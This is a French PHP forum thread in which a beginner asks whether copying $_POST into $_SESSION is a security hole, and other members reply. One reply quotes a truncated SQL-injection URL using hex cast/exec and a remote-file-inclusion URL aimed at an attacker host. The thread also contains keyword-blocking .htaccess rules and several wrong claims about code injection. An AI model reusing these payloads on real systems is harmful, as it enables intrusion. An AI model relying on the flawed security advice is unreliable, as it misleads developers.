Hébergement du site en PHP et Mysql par WDMédia-hébergement
Vous aussi adpotez les éléPHPants de Vincent Pontier !  


Rechercher dans le forum

Mots-clés :

Trouver :
un de ces termes tous les termes

Depuis :
7 j 15 j 30 j


Retour à l'index du forum

Faille : POST => SESSION

Message original de Moijhd

Le : 28/12/2008 à 11:25:57

Dejà lu 18656 fois avant vous

Bonjour !

Je voulais récupérer mes variables venant dans formulaire POST avec :


<?php
foreach($_POST as $key => $value){
    
$_SESSION[$key] = $value;
}
?>



Lors de la connexion, je crée la variable $_SESSION['connexion_id'].
Cependant, si je crée un champs connexion_id dans mon formulaire, je vais écraser celui qui correspond à l'identifiant de connexion...

J'ai donc conclu que ce système était mauvais :) !

Ma solution : pour la connexion ma nouvelle variable serait $_SESSION['connexion']['id'] et pour le formulaire j'utiliserais $_SESSION['formulaire']['nom_du_champ_dans_le_fomulaire'], etc.

Cela me permet t'il d'empecher que l'on modifie la variable $_SESSION['connexion']['id'] ?

Mon code deviendrait :


<?php
foreach($_POST as $key => $value){
    
$_SESSION['formulaire'][$key] = $value;
}
?>



Merci !

PS : N'y aurait il aucun autre risque que je n'aurais pas vu ?

Re: Faille : POST => SESSION

Réponse de Nicolas

Le : 28/12/2008 à 11:36:27

Quel est l'intérêt de ce que tu fais ? Pourquoi veux-tu passer le contenu du tableau $_POST dans $_SESSION ?

Re: Faille : POST => SESSION

Réponse de Moijhd

Le : 28/12/2008 à 11:50:33

Pour les renvoyer vers un formulaire par header

Re: Faille : POST => SESSION

Réponse de Moijhd

Le : 28/12/2008 à 11:52:56

POST SESSION
Formulaire ------------------> Page de controle -----------------------> Formulaire
|----------------------------------> Traitement

Re: Faille : POST => SESSION

Réponse de Moijhd

Le : 28/12/2008 à 11:54:35

Mdr, mon joli schéma ne passe pas :)

Formulaire -> POST => Controle -> SESSION => Formulaire

Re: Faille : POST => SESSION

Réponse de luce

Le : 28/12/2008 à 13:09:41

Salut,

En faites, tu veux savoir si on peut mettre ce que l'on veut dans $_SESSION['connexion'][id].

Vu que ça vient de $_POST, que $_POST tout comme $_GET sont modifiable par n'importe qui, et sans savoir quel type de controle tu fais, la réponse est oui.

Maintenant, c'est quoi l'id ? l'id user ? si c'est ça, c'est déjà en session, donc pourquoi le mettre dans le $_POST...

Si ton système de "controle" c'est ça :
foreach($_POST as $key => $value){
$_SESSION[$key] = $value;

Alors, c'est pas un systeme de controle, et je dirais même pire, c'est une faille de sécurité !
Imaginons que ton site utilise une session $_SESSION['isadmin']
Qu'est ce qu'il m'empeche d'ajouter dans el formulaire un $_POST['isadmin'] !

Franchement, je comprends pas les gens fénéants qui utilisent des extract() à tout va (c'est ce que tu fais en faites).

Récupère chaque $_POST un à un, et applique des controles sur chacun d'eux, en fonction de leurs contenu, donc des is_int(), is_numeric(), htmlentities(), et des filter_var()

Re: Faille : POST => SESSION

Réponse de Moijhd

Le : 28/12/2008 à 13:59:39

Je pensais que mon premier post était suffisament clair : je vais reprendre.

La question est effectivement :

Peut -on mettre ce que l'on veut dans $_SESSION['connexion']['id'] ?

Etant donné que ta réponse est oui, pourrais tu me donner le nom qu'il faudrait donner au champs pour que tel soit le cas (pour que je comprenne pourquoi), sachant que j'utilise desormais :


<?php 
foreach($_POST as $key => $value){ 
    
$_SESSION['formulaire'][$key] = $value

?> 



pour éviter justement la "faille directe" :


<?php 
foreach($_POST as $key => $value){ 
    
$_SESSION[$key] = $value

?> 

Re: Faille : POST => SESSION

Réponse de Moijhd

Le : 28/12/2008 à 14:09:27

Je rappelle aussi qu'il a été crée préalablement, par exemple, une variable $_SESSION['connexion]['id'].

Et je suis effectivement fénéant, et c'est la raison pour laquelle je me pose en particulier cette question.
Et j'ai bien évidement conscience que si je les récupérais un à un ce serait beaucoup plus sur...mais ça ne m'interesse pas (de le récuperer un ç un, la sécurité biensur j'y tiens :p)
Et si j'avais voulu, j'aurais très certainement utilisé extract() mais j'ai pas eu envie !
Et les "controles" n'ont rien voir avec le problème actuelle.

Re: Faille : POST => SESSION

Réponse de luce

Le : 28/12/2008 à 14:30:31

Re,

Bah, comme je te dis, si tu ne controles pas le contenu, oui, on peut modifier ton connexion id.

Je ne suis pas une pirate informatique, mais le principe, c'est que le hacker va entrer dans ton post un :

xxxx'; $_SESSION['connexion'][id] = idadmin;

Si tu changeais déjà par ça :

<?php  
foreach($_POST as $key => $value){  
    
$_SESSION['formulaire'][$key] = htmlentities($value);  
}  
?> 



Mais toujours pareil, suivant le contenu des post, ca peu causer des soucis, puis tu as aussi la faille du mysql_real_escape_string() qui pourrait venir après.

Tu vois ce que je veux dire ?

Ta méthode, pour des infos provenant d'un formulaire, tout comme ça pourrait provenir d'une url, c'est vraiment une mauvaise idée, tu as vraiment trop peu de controle sur ce qui est entre, donc une faille de sécurité potentielle.

Ce que tu fais, on pourrait l'utiliser à la rigueur, sur un resultat sql, mais perso, j'aime vraiment pas.

Re: Faille : POST => SESSION

Réponse de luce

Le : 28/12/2008 à 14:42:20

Ah oui, à la rigueur, trouve un autre nom que "connexion" par exemple "c0nn3x1on"
(vu que je ne connais pas ce que peux contenir ton formulaire)
Et via un .htaccess, tu interdis le mot c0nn3x1on de tout ce qui est POST et GET.

Ca doit te donner un truc comme ça :
RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
RewriteCond %{QUERY_STRING} ^(.*)c0nn3x1on(.*)$ [NC]
RewriteRule ^.* - [F]

Par contre, si tu laisses connexion, je suis pas sur si on peut mettre un message, que la personne par malheur utilise le mot "connexion" il va se faire jeter.

Re: Faille : POST => SESSION

Réponse de Moijhd

Le : 28/12/2008 à 14:57:39

Désolé je ne comprend toujours pas !

On oublie d'abord tout ce qui concerne mysql (je n'ai jamais parlé de base de données, et donc je considère que ce n'est pas - encore - le problèle).
On oublie également ta dernière solution qui ne me parait pas très rigoureuse et un peu plus difficile à mettre en oeuvre (je ne dis pas que ce que je fais est mieux).

Le problème que tu suggeres est donc que $value pouvant contenir n'importe quoi (ce qui est vrai pour n'importe quel champs), il y a un rique pour que

$_SESSION['formulaire'][$champ] = $_POST[$champ];

devienne dans l'éxécution du script

$_SESSION['connexion]['id'] = idadmin;

suivant le contenu de $_POST[$champ] où $champ et $_POST[$champ] sont inconnus

??

Re: Faille : POST => SESSION

Réponse de Moijhd

Le : 28/12/2008 à 15:14:24

C'est-à-dire que :

$champ vaudrait

'nimportequoi1'] = "nimportequoi2"; $_SESSION['connexion]['id'

et que $_POST[$champ] vaudrait

idadmin

$_SESSION['formulaire']['nimportequoi1'] = "nimportequoi2"; $_SESSION['connexion]['id'] = idadmin;

Re: Faille : POST => SESSION

Réponse de luce

Le : 28/12/2008 à 15:15:45

Non, pas du tout,

Ce que je te dis, c'est qu'il y a un risque que un des champs se retrouve tel quel dans ton script :
//premier traitement
$_SESSION['formulaire'][$champ] = $_POST[$champ];$_SESSION['connexion']['id'] = 'ID_DE_L'ADMIN';
// traitement du champs suivant
$_SESSION['formulaire'][$champ] = $_POST[$champ];

Vu que tu ne fais pas de réel controle, il est fort possible que le hacker puisse ajouter un '; (il existe pas mal d'astuce pour ça), et donc, ensuite, il peut mettre n'importe quoi comme code php, et le script en prendra compte, tel que modifier les sessions, effacer les bases de données, afficher des fichiers de configuration...

Pour ce qui est du .htaccess, en faites, si tu prévois des le début, d'utiliser des noms de variable que l'on n'a très peu de risque de taper dans un contexte "normal", alors, c'est le meilleur système de protection.
Et au niveau de la mise à jour, bah, vu que ça tien sur quelques lignes, que sa infecte tout ton site, c'est vraiment un gain de temps.
Par exemple, pour éviter qu'un hacker fasse mumusse avec sql, tu peux ajouter ça :
RewriteCond %{QUERY_STRING} ^(.*)(SELECT|INSERT|DELETE|CHAR\(|UPDATE|REPLACE|LIMIT)(.*)$

Biensur, faut pas que des post ou get contiennent des SELECT INSERT... sinon, ca jete la personne.
Mais si tu t'y prends bien que tu penses bien le code de ton site, alors tu as une très bonne parade contre l'exploitation des failles de PHP/SQL.

Tu comprends un peu mieux ?

D'ailleurs, une chose que tu peux interdire d'office coté htaccess, c'est le 0x, pour annuler le 0xB227 ou tout autre utilisation de l'Hexadecimal dans les posts.

Re: Faille : POST => SESSION

Réponse de luce

Le : 28/12/2008 à 15:24:54

Re,

Tu as reposté pendant que je préparais le post, mais je pense que tu as compris le problème.

En faites, comme tu n'as aucun controle du contenu de tes $_POST, il peut se cacher n'importe quoi dedans, et ça, c'est le problème. Et je pense que tu comprends pourquoi je te dis qu'il peut modifier le $_SESSION['connexion']

D'ailleurs, utiliser des variable commune pour des choses importantes, c'est pas la meilleur idée non plus !

Il faut que quand tu codes, tu trouves quelques idées pour tes noms de variable, et qu'ils restent compréhensible par tout, soit avec c0nn3x10n, soit en faissant des "fautes" par exemple conenxion (meme en voyant la faute, tu peux pas t'empecher de lire "connexion", et il te faut te concentrer pour lire correctement ce qu'il est écrit, quel merveille notre cerveau !)

Re: Faille : POST => SESSION

Réponse de Moijhd

Le : 28/12/2008 à 15:37:38

Je poursuis mon raisonnement (tu as le droit d'abandonner :)) !

Si il y a des risques de

$_SESSION['formulaire'][$champ] = $_POST[$champ];$_SESSION['connexion']['id'] = 'ID_DE_L'ADMIN';

Alors ça veut dire que

$_POST[$champ];$_SESSION['connexion']['id'] = 'ID_DE_L'ADMIN';

correspondra forcément à une de mes $value, qui sera elle-même forcément interprétée comme une string.

Donc je ne vois vraiment pas le risque pour que subitement ce texte se transforme en variable.

Re: Faille : POST => SESSION

Réponse de luce

Le : 28/12/2008 à 15:51:06

Non, ce que je veux dire, c'est que tu n'as aucun controle sur le fait que le hacker va ajouter dans ton $value, un code specifique qui correspondra à '; (apostrophe point virgule) ce qui fermera le $value et lui laisse de quoi coder.

En gros, on va dire qu'il va transformer ton foreach, pour un des posts, qui fera en sorte que ton foreach soit modifier comme ça :

<?php  
foreach($_POST as $key => $value){  
    
$_SESSION['formulaire'][$key] = $value;  
    
$_SESSION['connexion']['id'] = 'ID_ADMIn';
}  
?> 



Tu comprends mieux ?

Re: Faille : POST => SESSION

Réponse de Moijhd

Le : 28/12/2008 à 15:54:11

Oui mais encore un fois, ce '; sera considéré comme du texte ?

Re: Faille : POST => SESSION

Réponse de luce

Le : 28/12/2008 à 16:02:54

Ah voila !

Tu commences à comprendre, mais non, il existe des moyens pour que le '; ne soit pas considerer comme du texte (tu comprendras que peu de site veulent expliquer comment c'est possible), mais quand on parle de faille de sécurité, dans beaucoup de cas, c'est qu'il est possible de fermer la variable, la requete...

Et comme tu ne fais rien pour controler, il y a donc un risque, mais encore faudrait-il qu'il ai connaissance de nom de la session, mais voila, la tout premiere chose qu'il va faire, c'est d'ajouter un code pour faire ça :
print_r($_SESSION);

Et la, boom, il voit le contenu de $_SESSION, et donc, il sait quoi ajouter comme ligne de code pour hacker le compte admin.

Re: Faille : POST => SESSION

Réponse de Moijhd

Le : 28/12/2008 à 16:08:00

D'accord, ça je le sais, donc il y a autant de risque à faire ce que je fais ou

echo $_POST['champ'];

où $_POST['champ'] vaudrait $_SESSION['connexion']['id'] avec tout ce qu'il faut pour qu'un hacker fasse afficher non pas le texte $_SESSION['connexion']['id'] mais la variable $_SESSION['connexion']['id'].

Re: Faille : POST => SESSION

Réponse de luce

Le : 28/12/2008 à 16:14:35

hmmm, je comprends pas trop là.

Bon en gros, il va fermer le $_POST['champ'] donc quand tu fais echo $_POST['champ'] tu ne veras rien de bizarre, par contre, il aura ajouter des lignes de code.

J'ai pas d'exemple de $_POST, mais voici un $_GET (et ce que l'on fait en $_GET est totalement possible en $_POST),


www.site.tld/forum/viewtopic.php?topic_id=560&forum=1';declare%20@s%20char(4000);set%20@s=cast(0x4445434c41536f72%20as%20char(4000));exec(@s);



donc, il essai d'ajouter le "declare" qui devrait être interpreter.

Alors que toi, avec ton raisonnement (enfin je pense que c'est ce que tu penses), à cause du '; php/sql va s'arrêter la, mais non, ils vont continuer !

(ps : j'ai coupé la chaine du cast, elle fait 50 kilometre)

Re: Faille : POST => SESSION

Réponse de Moijhd

Le : 28/12/2008 à 16:21:35

J'abandonne.

Re: Faille : POST => SESSION

Réponse de luce

Le : 28/12/2008 à 16:47:15

Bah, écoute, je vais te poser une question :

Pourquoi tout le monde dit qu'il faut sécuriser tout ce qui provient des visiteurs ?

Puis une autre question :
Est-ce que ta fonction sécurise ?

Comme je te dis plus haut, utilise un htmlentities en minimum. Mais ton idée, c'est une très mauvaise idée.

Tiens, si tu t'obstines tout de même, voici ce que tu peux ajouter juste après la fonction session_start(), enfin dans un fichier type header.php, c'est la fonction basique de l'aedituus pour avoir un minimum de filtrage :


function prepare_array($var)
{
    if (is_array($var)) {
        return array_map('prepare_array', $var);
    } else {
        return trim ( (get_magic_quotes_gpc()) ? stripslashes($var) : $var);
    }
}

$_GET = prepare_array($_GET);
$_POST = prepare_array($_POST);
$_COOKIE = prepare_array($_COOKIE);


Re: Faille : POST => SESSION

Réponse de Nicolas

Le : 28/12/2008 à 16:51:03

Pour ce que tu proposes de faire, je ne vois pas l'intérêt de passer par une session. Ou alors j'ai raté quelque chose.

Si vraiment tu dois passer par une session, la solution de faire :

$_SESSION['formulaire'] = $_POST

ne pose aucun problème de sécurité. Après pour les étapes suivantes, il faudra bien évidemment filtrer tout cela. Généralement, on fait le filtre avant de mettre en session.

Luce, ne sors pas l'armada pour un truc aussi simple!

Re: Faille : POST => SESSION

Réponse de luce

Le : 28/12/2008 à 16:59:45

Voila qui resume bien ce que j'essai de dire, on filtre AVANT de mettre en session, chose qu'il ne fait pas (j'arrivais pas à le tourner correctement, c'est con !), il met directement en session, d'ou le risque.

Et c'est pour ça, que je lui dis :

<?php   
foreach($_POST as $key => $value){   
    
$_SESSION['formulaire'][$key] = htmlentities($value);   
}   
?> 



C'est déjà bien mieux, je dirais même le minimum à faire.

Re: Faille : POST => SESSION

Réponse de luce

Le : 28/12/2008 à 17:03:35

Ah, voila ce que je cherchais (vive google) http://www.phpdebutant.org/article150.php

Ca explique ce que j'essai de lui expliquer.

Re: Faille : POST => SESSION

Réponse de Moijhd

Le : 28/12/2008 à 23:12:11

http://phpdebutant.org/wall1312.php

Re: Faille : POST => SESSION

Réponse de Moijhd

Le : 28/12/2008 à 23:13:44

J'ai oublié un petit bout : http://phpdebutant.org/wall1322.php

A débattre !

Re: Faille : POST => SESSION

Réponse de luce

Le : 29/12/2008 à 00:45:56

Re,

Alors, j'aime pas ta ligne <form> de ton inscription php
Donc, je l'ai modifié comme ici :

<?php 
if(isset($_GET['action']) && ($_GET['action'] == "modification"))
{
    echo 
"modification_verif.php?action=modification";
} else {
    echo 
"inscription_verif.php?action=".$_GET['action'];
}
?>



Et la, je me suis rendue compte d'un gros soucis (comme j'arrete pas de te dire :-D)

http:://www.ton_site.tld/inscription.php?action=http://www.mechant_hacker.tld/je_fais_sauter_ton_site.php
je suis pas loin d'être une spécialiste en piratage, mais je vois souvent des tentatives de la sorte sur mon site, comme on a essaye dernière le style de connerie que tu as, avec ce lien http://www.geocities.com/coracore99/r0bot.txt?? (pourquoi ils veulent savoir l'espace disque !)


Alors que tu pourrais ajouter un petit if avant :

if (preg_match('`^[[:alnum:]]{4,30}$`',$_GET['action'])) {

(4,30) c'est le nombre de caractère minimum et maximum contenu dans la chaine, alnum pour alpha numeric.

Pour l'adresse email, au lieu de faire tes ereg, fait plutot un filter_var :
filter_var($_POST['email'], FILTER_VALIDATE_EMAIL)

Pour la date, tu peux faire :
$date_inscription = date('Y-m-d H:i:s');
Ca évite d'avoir 2 fois l'appel à la fonction date()

On utilise JAMAIS addslashes pour une requete sql, on utilise TOUJOURS mysql_real_escape_string() comme tu fais pour le pseudo

Et ensuite, pour gagner (vraiment pas grand chose pour ton script) un peu de temps d'execution, privilige les apostrophes aux guillemets, tel que ici :
$pages_autorisees = array('inscription', 'modification', 'connexion', 'deconnexion');

Après, vu que je dors déjà devant mon écran, je garantie pas que j'ai zappé quelque chose d'important (j'ai un gros doute, mais je trouve pas)

Bon, je vais me dodoter moi !

Re: Faille : POST => SESSION

Réponse de Moijhd

Le : 29/12/2008 à 19:03:13


<?php
$pages_autorisees 
= array('inscription''modification''connexion''deconnexion');
$page_inexistante 'inexistante.php';
$page_defaut 'accueil.php';
if(isset(
$_GET['page'])){
    if(
in_array($_GET['page'], $pages_autorisees)){
        
// Page demandée
        
include($_GET['page'].'.php');
    }
    else{
        
// Page inexistante
        
include($page_inexistante);
    }
}
else{
    
// Page par défaut
    
include($page_defaut);
}
?>



Cela suffit il où faut il ajouter par exemple $page = htmlentities(addslashes($_GET['page'])) (et pourquoi :)) ?

Re: Faille : POST => SESSION

Réponse de luce

Le : 29/12/2008 à 19:48:26

Salut,

Alors, déjà regarde avec echo get_magic_quotes_gpc(); si il affiche un 1 ou pas.
Si tu as un 1, c'est qu'il ajoute de manière automatique les addslashes.

Ensuite, tu as $page = htmlentities($_GET['page'], ENT_QUOTES) qui comparer à addslashes va transformer les ' en code html (ce qui ne change rien pour l'affichage de ta page) en &#039;

Dans en gros, le addslashes n'est pas trop important, vu qu'il sera transformé.

Re: Faille : POST => SESSION

Réponse de luce

Le : 29/12/2008 à 19:52:48

Rah, a chaque fois j'oublie un truc.

Si tu as un 1, prévois un stripslashes() pour éviter les \ dans les messages.

Par contre, je n'ai pas fait gaffe, vu que tu as changé ta facon de faire, il n'y a plus de risque, plus besoin de htmlentities ou autre vu que tu fais une vérification par l'array, et qu'en suite, si c'est pas dans l'array, alors tu renvoi sur des pages que tu as défini toi même et plus comme tu avais fait :
echo "inscription_verif.php?action=".$_GET['action'];

(C'est ça qui était dangereux).

Re: Faille : POST => SESSION

Réponse de Moijhd

Le : 30/12/2008 à 00:59:37

Et maintenant, est ce un peu mieux (quelques modifications apportées)

http://phpdebutant.org/wall1332.php

Re: Faille : POST => SESSION

Réponse de luce

Le : 30/12/2008 à 13:00:23

Salut,

J'ai trouvé un problème !
Si une personne tape :
monpseudo

Je sais pas si tu as fait gaffe, mais apparament, cette personne a eut le malheur de laisser trainer son pouse sur la barre d'espace, et à ajouter un espace avant son pseudo !

elle va galèrer pour s'identifier après !!!

Pour faire sauter les espaces en début de chaine, il y a une fonction pour ça : trim() http://php.net/trim
En gros, dès que tu récupères des $_POST, tu les trim() et voila, pas de soucis d'espace en debut de chaine (et fin de chaine).

Après, que ce soit mot de passe ou pseudo, tu peux ajouter un nombre de caractère minimum/maximum.

Voila, je crois qu'après, ca sera déjà pas trop mal.

Re: Faille : POST => SESSION

Réponse de Moijhd

Le : 30/12/2008 à 15:03:18

Pas faux ! Mais je veux mieux que aps trop mal :)

Re: Faille : POST => SESSION

Réponse de Moijhd

Le : 30/12/2008 à 15:07:51

Donc je fais maintenant :



INI.PHP

<?php
function ToSql($value){
    return 
mysql_real_escape_string(trim($value));
}
?>

INSCRIPTION_VERIF.PHP

<?php
$sql 
"SELECT id FROM $table WHERE pseudo = '".ToSql($_POST['pseudo'])."'"
?>

Retour à l'index du forum


Ajouter une réponse

Nom :

Email :

Titre :

Message :

Combien font 3 + 4 ?

Mise en forme : gras = [b]...[/b], italic = [i]...[/i], souligné = [u]...[/u], citation = [quote]...[/quote], lien = [url]liens_externe[/url] ou [url nom=texte]liens_externe[/url], code source : [code]...[/code]

Recevoir les réponses par mail :
Oui Non

Mémoriser mon nom et mon email :
Oui Non

 

Charte des forums PHPDébutant

Bienvenue à vous,

Vous voici donc prêt à poster sur les forums de PHPDébutant. Avant toute chose, merci de prendre le temps de lire les quelques lignes qui suivent.

Attention, à partir du moment ou vous postez dans les forums, vous acceptez la présente charte. Si votre message est modéré ou supprimé, vous ne pourrez pas dire que vous n'étiez pas au courant des règles !

Pourquoi une charte

Le but de cette charte est simple : que ces forums restent cordiaux et que les personnes aidant les autres ne se sentent pas lésées, insultées, critiquées. Pour que ces forums fonctionnent, il faut des personnes qui répondent aux questions. Pour que celles ci restent sur le forum, il faut les traiter avec respect, et ne pas les confondre avec des bonnes poires, esclaves, etc...

Mesures de régulation

  • Un nouveau message ne disant pas bonjour, ou insultant, dont le titre est tout en majuscules, pourra être supprimé sans justification (raisons non limitatives).
  • Prenez le temps de vérifier que la question que vous allez poser n'a pas déjà été posée, à l'aide du formulaire de recherche.
  • Prenez également le temps de vérifier que la réponse à votre question ne se trouve pas dans les tutoriaux. Nous ne pouvons pas répeter pour chaque visiteur tous les cours, il sont écrits, profitez-en (dans l'ordre tant qu'à faire) !
  • Nous ne faisons pas de scripts tout prêts. Nous aidons et vous guidons pour que vous puissiez trouver vous même la réponse, ce qui est beaucoup plus formateur.
  • Si vous comptez poster un message publicitaire, abstenez-vous. Au mieux le message sera supprimé, au pire les habitués descendront votre service en flamme.
  • Pour tout message de recrutement, précisez bien votre demande. Inutile de poster pour trouver un développeur pour faire gratuitement votre site de webmastering qui vous rapportera plein de sous. Les seuls coups de mains donnés en développement sont pour des associations ou des sujets passionnant un développeur.
  • Toute personne tenant des propos racistes ou illicites sera bannie et pourra faire l'objet de poursuites.
  • L'humour étant très présent sur ces forums, ne réagissez pas violemment à des propos qui pourraient être à prendre au second degré et avec de l'humour.
  • Attention aux trolls ! Leur multiplication peut entraîner la mort des forums, et sans forum, plus d'aide !
  • Respectez les thèmes des forums. Pensez aussi à vérifier que votre message n'a pas été déplacé si vous le croyez effacé.

Conseils

  • N'oubliez pas que les personnes à qui vous vous adressez sont des bénévoles qui donnent de leur temps pour vous. Si vous êtes méchants avec eux, il n'aideront plus et vous n'aurez plus d'aide !
  • Ne soyez pas pressé. Nous avons une vie aussi, et nous ne sommes par forcément tout le temps disponibles.
  • N'oubliez pas que les smileys sont la pour faire comprendre l'humeur dans laquelle vous rédigez un message. Il est indispensable de mettre des smileys quand vous faites de l'humour, sinon le message pourrait être mal perçu (ca serait quand même idiot de plomber l'ambiance en faisant de l'humour !).
  • Surveillez votre orthographe, nous ne vous demandons pas d'être littéraire, mais que votre message soit au moins compréhensible. Evitez à tout prix le style SMS.
  • Expliquez clairement le problème, ce n'est pas toujours facile, mais mieux vaut essayer de le faire le plus possible.
  • Ne postez pas de questions trop vagues du genre "comment faire un forum". Cela ne sert à rien, cela ne s'explique pas sur un coin de forum.
  • Mettez un titre clair, correspondant au sujet que vous allez poster. A l'aide, au secours, etc... ne sont pas d'une grande utilité pour ceux qui vont vous aider. Parfois nous passons en coup de vent, et si nous ne savons pas ce que va contenir le message, nous ne le regarderons même pas.
  • Ne mettez par [URGENT] ou autre joyeuseté du genre dans vos titres de messages. Cela irrite les gens (il y'a plus urgent dans la vie, pensez aux gens qui meurent de faim ou ayant besoin des pompiers, ça c'est urgent), et vous n'aurez pas votre réponse plus vite pour autant.
  • Si vous connaissez déjà à quel domaine votre question d'adresse (par exemple mysql, html, php, javascript), n'hésitez pas à le marquer au début de votre message, avec un [html] par exemple (notez les minuscules).
  • Ne dites pas "ça marche pas". Il y a toujours des raisons. Je vous invite à consulter le tutorial "ça marche pas" qui vous aidera à mieux expliquer votre problème.
  • Ne postez pas 36000 lignes de code. Sur le forum, le code apparaît non coloré et sans indentation, ce qui est illisible. Au dessus de 5 lignes, plus personne ne lit et vous n'aurez pas de réponse. Utilisez le wall
  • En règle générale restez courtois et clair, n'oubliez pas que la politesse fait partie de la vie courante. Il est de bon ton de dire bonjour même pour une réponse, même plusieurs fois dans la journée (ceux qui vous lisent n'ont pas forcément lu vos autres messsages)

La Fin

Avec tout ces conseils vous augmenterez les chances de réponse, leur pertinence et leur rapidité

Voilà, ça sera tout, bonne écriture :)

Fermer les règles et poster un message


www.phpdebutant.org © 2024 - L'équipe de phpDebutant - Hébergement : WDMédia-hébergement